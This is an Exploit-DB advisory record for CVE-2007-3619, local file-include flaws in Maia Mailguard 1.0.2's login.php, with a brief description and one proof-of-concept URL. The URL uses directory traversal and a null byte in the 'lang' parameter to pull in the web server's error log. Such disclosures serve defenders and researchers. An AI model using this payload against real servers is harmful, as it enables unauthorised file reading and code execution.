Maia Mailguard 1.0.2 Login.PHP Multiple Local File Include Vulnerabilities

2007-07-05T00:00:00
ID EDB-ID:30277
Type exploitdb
Reporter Adriel T. Desautels
Modified 2007-07-05T00:00:00

Description

Maia Mailguard 1.0.2 Login.PHP Multiple Local File Include Vulnerabilities. CVE-2007-3619. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/24770/info

Maia Mailguard is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.

Exploiting these issues may allow an unauthorized user to view files and execute local scripts.

These issues affects Maia Mailguard 1.0.2 and prior versions. 

http://www.example.com/maia/login.php?lang=../../../../../../../../../../../../../var/log/httpd-error.log%00.txt